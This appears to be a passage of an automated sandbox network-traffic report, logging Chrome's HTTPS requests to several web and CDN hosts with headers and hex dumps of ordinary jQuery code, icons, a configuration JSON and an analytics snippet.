                                                                                                                                                          2024-06-09 22:40:51 UTC15674INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 31 31 2e 33 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 35 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e
                                                                                                                                                          Data Ascii: /*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a win
                                                                                                                                                          2024-06-09 22:40:51 UTC16384INData Raw: 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74 75 72 6e 20 65 5b 75 5d 3f 65 28 62 29 3a 65 2e 6c 65 6e 67 74 68 3e 31 3f 28 63 3d 5b 61 2c 61 2c 22 22 2c 62 5d 2c 64 2e 73 65 74 46 69 6c 74 65 72 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3f 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 76 61 72 20 64 2c 66 3d 65 28 61 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d
                                                                                                                                                          Data Ascii: d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||ga.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?ia(function(a,c){var d,f=e(a,b),g=f.length;while(g-
                                                                                                                                                          2024-06-09 22:40:51 UTC16384INData Raw: 29 69 66 28 28 22 64 61 74 61 22 21 3d 3d 62 7c 7c 21 6d 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 61 5b 62 5d 29 29 26 26 22 74 6f 4a 53 4f 4e 22 21 3d 3d 62 29 72 65 74 75 72 6e 21 31 3b 0a 0a 72 65 74 75 72 6e 21 30 7d 66 75 6e 63 74 69 6f 6e 20 51 28 61 2c 62 2c 64 2c 65 29 7b 69 66 28 6d 2e 61 63 63 65 70 74 44 61 74 61 28 61 29 29 7b 76 61 72 20 66 2c 67 2c 68 3d 6d 2e 65 78 70 61 6e 64 6f 2c 69 3d 61 2e 6e 6f 64 65 54 79 70 65 2c 6a 3d 69 3f 6d 2e 63 61 63 68 65 3a 61 2c 6b 3d 69 3f 61 5b 68 5d 3a 61 5b 68 5d 26 26 68 3b 69 66 28 6b 26 26 6a 5b 6b 5d 26 26 28 65 7c 7c 6a 5b 6b 5d 2e 64 61 74 61 29 7c 7c 76 6f 69 64 20 30 21 3d 3d 64 7c 7c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 62 29 72 65 74 75 72 6e 20 6b 7c 7c 28 6b 3d 69 3f 61 5b
                                                                                                                                                          Data Ascii: )if(("data"!==b||!m.isEmptyObject(a[b]))&&"toJSON"!==b)return!1;return!0}function Q(a,b,d,e){if(m.acceptData(a)){var f,g,h=m.expando,i=a.nodeType,j=i?m.cache:a,k=i?a[h]:a[h]&&h;if(k&&j[k]&&(e||j[k].data)||void 0!==d||"string"!=typeof b)return k||(k=i?a[
                                                                                                                                                          2024-06-09 22:40:51 UTC16384INData Raw: 6d 75 6c 74 69 70 6c 65 27 3e 22 2c 22 3c 2f 73 65 6c 65 63 74 3e 22 5d 2c 6c 65 67 65 6e 64 3a 5b 31 2c 22 3c 66 69 65 6c 64 73 65 74 3e 22 2c 22 3c 2f 66 69 65 6c 64 73 65 74 3e 22 5d 2c 61 72 65 61 3a 5b 31 2c 22 3c 6d 61 70 3e 22 2c 22 3c 2f 6d 61 70 3e 22 5d 2c 70 61 72 61 6d 3a 5b 31 2c 22 3c 6f 62 6a 65 63 74 3e 22 2c 22 3c 2f 6f 62 6a 65 63 74 3e 22 5d 2c 74 68 65 61 64 3a 5b 31 2c 22 3c 74 61 62 6c 65 3e 22 2c 22 3c 2f 74 61 62 6c 65 3e 22 5d 2c 74 72 3a 5b 32 2c 22 3c 74 61 62 6c 65 3e 3c 74 62 6f 64 79 3e 22 2c 22 3c 2f 74 62 6f 64 79 3e 3c 2f 74 61 62 6c 65 3e 22 5d 2c 63 6f 6c 3a 5b 32 2c 22 3c 74 61 62 6c 65 3e 3c 74 62 6f 64 79 3e 3c 2f 74 62 6f 64 79 3e 3c 63 6f 6c 67 72 6f 75 70 3e 22 2c 22 3c 2f 63 6f 6c 67 72 6f 75 70 3e 3c 2f 74 61 62
                                                                                                                                                          Data Ascii: multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],area:[1,"<map>","</map>"],param:[1,"<object>","</object>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></tab
                                                                                                                                                          2024-06-09 22:40:51 UTC16384INData Raw: 73 29 2c 74 68 69 73 7d 7d 2c 5a 61 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 2e 70 72 6f 74 6f 74 79 70 65 3d 5a 61 2e 70 72 6f 74 6f 74 79 70 65 2c 5a 61 2e 70 72 6f 70 48 6f 6f 6b 73 3d 7b 5f 64 65 66 61 75 6c 74 3a 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 2e 65 6c 65 6d 5b 61 2e 70 72 6f 70 5d 7c 7c 61 2e 65 6c 65 6d 2e 73 74 79 6c 65 26 26 6e 75 6c 6c 21 3d 61 2e 65 6c 65 6d 2e 73 74 79 6c 65 5b 61 2e 70 72 6f 70 5d 3f 28 62 3d 6d 2e 63 73 73 28 61 2e 65 6c 65 6d 2c 61 2e 70 72 6f 70 2c 22 22 29 2c 62 26 26 22 61 75 74 6f 22 21 3d 3d 62 3f 62 3a 30 29 3a 61 2e 65 6c 65 6d 5b 61 2e 70 72 6f 70 5d 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6d 2e 66 78 2e 73 74 65 70 5b
                                                                                                                                                          Data Ascii: s),this}},Za.prototype.init.prototype=Za.prototype,Za.propHooks={_default:{get:function(a){var b;return null==a.elem[a.prop]||a.elem.style&&null!=a.elem.style[a.prop]?(b=m.css(a.elem,a.prop,""),b&&"auto"!==b?b:0):a.elem[a.prop]},set:function(a){m.fx.step[
                                                                                                                                                          2024-06-09 22:40:52 UTC14746INData Raw: 5b 64 5d 3d 61 5b 64 5d 7c 7c 5b 5d 29 2e 75 6e 73 68 69 66 74 28 63 29 29 3a 28 61 5b 64 5d 3d 61 5b 64 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 63 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4d 62 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 7b 7d 2c 66 3d 61 3d 3d 3d 49 62 3b 66 75 6e 63 74 69 6f 6e 20 67 28 68 29 7b 76 61 72 20 69 3b 72 65 74 75 72 6e 20 65 5b 68 5d 3d 21 30 2c 6d 2e 65 61 63 68 28 61 5b 68 5d 7c 7c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 68 29 7b 76 61 72 20 6a 3d 68 28 62 2c 63 2c 64 29 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 6a 7c 7c 66 7c 7c 65 5b 6a 5d 3f 66 3f 21 28 69 3d 6a 29 3a 76 6f 69 64 20 30 3a 28 62 2e 64 61 74 61 54 79 70 65 73 2e 75 6e 73 68 69 66 74 28 6a 29 2c 67 28 6a 29 2c 21 31 29 7d 29 2c
                                                                                                                                                          Data Ascii: [d]=a[d]||[]).unshift(c)):(a[d]=a[d]||[]).push(c)}}function Mb(a,b,c,d){var e={},f=a===Ib;function g(h){var i;return e[h]=!0,m.each(a[h]||[],function(a,h){var j=h(b,c,d);return"string"!=typeof j||f||e[j]?f?!(i=j):void 0:(b.dataTypes.unshift(j),g(j),!1)}),


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          110192.168.2.549850183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:51 UTC538OUTGET /ftl/commonPage/js/float.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:51 UTC705INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 6959
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-HUZ-MP-02-11
                                                                                                                                                          ETag: "612747ba-1b2f"
                                                                                                                                                          Date: Thu, 06 Jun 2024 12:04:46 GMT
                                                                                                                                                          Last-Modified: Thu, 26 Aug 2021 07:50:18 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 12:04:46 GMT
                                                                                                                                                          Age: 297365
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-206
                                                                                                                                                          x-link-via: dgct63:443;huzmp02:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-HUZ-MP-02-11
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-20
                                                                                                                                                          X-Cdn-Request-ID: 238153dd52f630b4500f78b747c8c880
                                                                                                                                                          2024-06-09 22:40:51 UTC6959INData Raw: 2f 2a 2a 0a 20 2a 20 20 e6 b5 ae e5 8b 95 20 28 e9 a0 90 e8 a8 ad e5 8f b3 e4 b8 8a 20 74 6f 70 3a 31 35 30 29 0a 20 2a 20 20 40 65 78 61 6d 70 6c 65 20 20 20 24 28 22 23 69 64 22 29 2e 46 6c 6f 61 74 28 29 3b 0a 20 2a 20 40 70 61 72 61 6d 20 6f 62 6a 20 3a 20 7b 74 6f 70 53 69 64 65 3a 31 35 30 2c 62 6f 74 74 6f 6d 53 69 64 65 3a 27 61 75 74 6f 27 2c 66 6c 6f 61 74 52 69 67 68 74 3a 30 7c 31 2c 73 69 64 65 3a 35 2c 63 6c 6f 73 65 3a 73 65 6c 65 63 74 6f 72 7d 0a 20 2a 2f 0a 24 2e 66 6e 2e 46 6c 6f 61 74 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 6f 62 6a 29 20 7b 0a 20 20 20 20 76 61 72 20 65 6c 20 3d 20 74 68 69 73 3b 20 2f 2f 20 e5 bd 93 e5 89 8d e5 85 83 e7 b4 a0 0a 0a 20 20 20 20 76 61 72 20 6c 6f 63 6b 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 74 6f 70 53
                                                                                                                                                          Data Ascii: /** * ( top:150) * @example $("#id").Float(); * @param obj : {topSide:150,bottomSide:'auto',floatRight:0|1,side:5,close:selector} */$.fn.Float = function (obj) { var el = this; // var lock = { topS


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          111192.168.2.549852202.61.87.2244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:51 UTC363OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: xpj723.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: com_env=p
                                                                                                                                                          2024-06-09 22:40:51 UTC356INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:51 GMT
                                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                                          Content-Length: 140
                                                                                                                                                          Connection: close
                                                                                                                                                          Last-Modified: Wed, 27 Jun 2018 09:11:10 GMT
                                                                                                                                                          ETag: "5b3354ae-8c"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:51 UTC140INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 2e 49 44 41 54 78 da ec ce 31 01 00 00 08 03 a0 69 ff ce 33 86 0f 24 60 da e6 d3 e6 99 80 80 80 80 80 80 80 80 80 80 80 80 80 80 c0 09 30 00 40 b4 03 3d e3 0a 67 49 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<.IDATx1i3$`0@=gIIENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          112192.168.2.5498563.165.113.624434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:51 UTC372OUTGET /ocs/zbw?r=6891640824 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aka.blackkhaki918.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:52 UTC531INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:52 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 0a664d0529e2bd5dba55f6aeead607f2.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: CDG50-P3
                                                                                                                                                          X-Amz-Cf-Id: pWgiQjY1_ZpHt2noiFwokoAQ60mlGC0_pcQ8h0_QXR1dpVBEr4ZRvg==
                                                                                                                                                          2024-06-09 22:40:52 UTC3806INData Raw: 65 64 37 0d 0a 7b 0a 20 20 20 20 22 6e 6e 6e 22 3a 20 22 6f 75 74 65 72 2d 38 38 38 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 6d 22 3a 20 22 32 34 30 36 30 36 2d 30 31 22 2c 0a 20 20 20 20 20 20 20 20 22 7a 62 5f 70 63 5f 6d 65 6d 62 65 72 22 3a 20 22 32 34 30 35 32 39 2d 30 31 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 68 74 74 70 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 43 44 4e 5f 50 41 54 48 53 22 3a 20 5b 22 7a 62 2d 71 71 2e 67 7a 6a 71 77 6c 6b 6a 2e 63 6f 6d 22 2c 22 7a 62 31 2d 68 77 2e 71 65 63 74 79 6f 75 61 2e 63 6f 6d 22 2c 22 7a 62 2d 68 77 2e 63 7a 77 79 67 73 2e 63 6f 6d 22 5d 2c 0a 20 20 20 20 20 20 20 20 22 41 50 49 5f 44 4f 4d 41 49 4e 53 22 3a 20 5b 22 6f 63 73 61 70 69 2d 6c 63
                                                                                                                                                          Data Ascii: ed7{ "nnn": "outer-888", "versions": { "zb_m": "240606-01", "zb_pc_member": "240529-01" }, "http": { "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"], "API_DOMAINS": ["ocsapi-lc
                                                                                                                                                          2024-06-09 22:40:52 UTC8570INData Raw: 32 31 37 32 0d 0a 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 35 34 31 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 31 7d 2c 0a 09 22 74 33 35 34 32 22 3a 20 7b 22 76 22 3a 22 32 32 30 38 31 35 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 35 34 33 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 35 34 34 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 31 32 7d 2c 0a 09 22 74 33 35 35 39 22 3a 20 7b 22 76 22 3a 22 32 33 30 31 30 33 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 35 36 32 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 34 7d
                                                                                                                                                          Data Ascii: 2172: {"v":"240516-03","t":108},"t3541": {"v":"240516-03","t":101},"t3542": {"v":"220815-01","t":104},"t3543": {"v":"240516-03","t":104},"t3544": {"v":"240516-03","t":112},"t3559": {"v":"230103-01","t":104},"t3562": {"v":"240516-03","t":104}
                                                                                                                                                          2024-06-09 22:40:52 UTC6035INData Raw: 31 37 38 62 0d 0a 20 7b 22 76 22 3a 22 32 34 30 31 33 30 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 38 39 39 22 3a 20 7b 22 76 22 3a 22 32 33 31 30 30 35 2d 30 31 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 39 30 30 22 3a 20 7b 22 76 22 3a 22 32 33 31 30 30 35 2d 30 31 22 2c 22 74 22 3a 31 31 31 7d 2c 0a 09 22 74 33 39 30 31 22 3a 20 7b 22 76 22 3a 22 32 33 31 30 30 35 2d 30 31 22 2c 22 74 22 3a 31 31 30 7d 2c 0a 09 22 74 33 39 30 32 22 3a 20 7b 22 76 22 3a 22 32 34 30 35 31 36 2d 30 33 22 2c 22 74 22 3a 31 30 38 7d 2c 0a 09 22 74 33 39 30 33 22 3a 20 7b 22 76 22 3a 22 32 33 30 36 32 30 2d 30 31 22 2c 22 74 22 3a 31 30 34 7d 2c 0a 09 22 74 33 39 30 34 22 3a 20 22 32 33 31 30 30 35 2d 30 31 22 2c 0a 09 22 74 33 39 30 35 22 3a 20 22 32 33
                                                                                                                                                          Data Ascii: 178b {"v":"240130-01","t":108},"t3899": {"v":"231005-01","t":108},"t3900": {"v":"231005-01","t":111},"t3901": {"v":"231005-01","t":110},"t3902": {"v":"240516-03","t":108},"t3903": {"v":"230620-01","t":104},"t3904": "231005-01","t3905": "23
                                                                                                                                                          2024-06-09 22:40:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          113192.168.2.549848223.121.15.244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:51 UTC552OUTGET /cc.png?r=6084701866 HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://hg679.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:52 UTC605INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:52 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE2-CACHE9[461],EU-GER-frankfurt-EDGE2-CACHE7[457,TCP_MISS,460],EU-FRA-paris-GLOBAL1-CACHE7[443],EU-FRA-paris-GLOBAL1-CACHE7[282,TCP_MISS,441],1.1 google
                                                                                                                                                          X-CCDN-Origin-Time: 279
                                                                                                                                                          x-hcs-proxy-type: 0
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6ba4d6007392bac4da9b113729989255
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:52 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          114192.168.2.549854170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:51 UTC610OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&terminal=1&r=6412591773 HTTP/1.1
                                                                                                                                                          Host: ahd-ocssn.qqxgo.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://hg679.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:53 UTC507INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:52 GMT
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: aliyungf_tc=e0bf5c98a5bf6f1446fe246e48cb846c43e6eb8575d91ae87b23fb279b92618c; Path=/; HttpOnly
                                                                                                                                                          Server: Tengine/2.3.0
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          api-elapsed: 5
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:40:53 UTC1130INData Raw: 34 36 33 0d 0a 7b 22 61 6e 61 6c 79 74 69 63 73 43 6f 64 65 22 3a 22 28 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 64 2c 20 65 2c 20 6a 2c 20 73 29 20 7b 20 20 20 20 20 20 20 20 20 61 5b 64 5d 20 3d 20 61 5b 64 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 28 61 5b 64 5d 2e 61 20 3d 20 61 5b 64 5d 2e 61 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 20 20 20 20 20 20 20 20 20 7d 3b 20 20 20 20 20 20 20 20 20 6a 20 3d 20 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 2c 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 63 29 5b 30 5d 3b 20 20 20 20 20 20 20 20 20 6a 2e 61 73 79 6e 63 20 3d 20 74 72 75 65
                                                                                                                                                          Data Ascii: 463{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true
                                                                                                                                                          2024-06-09 22:40:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          115192.168.2.54984754.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
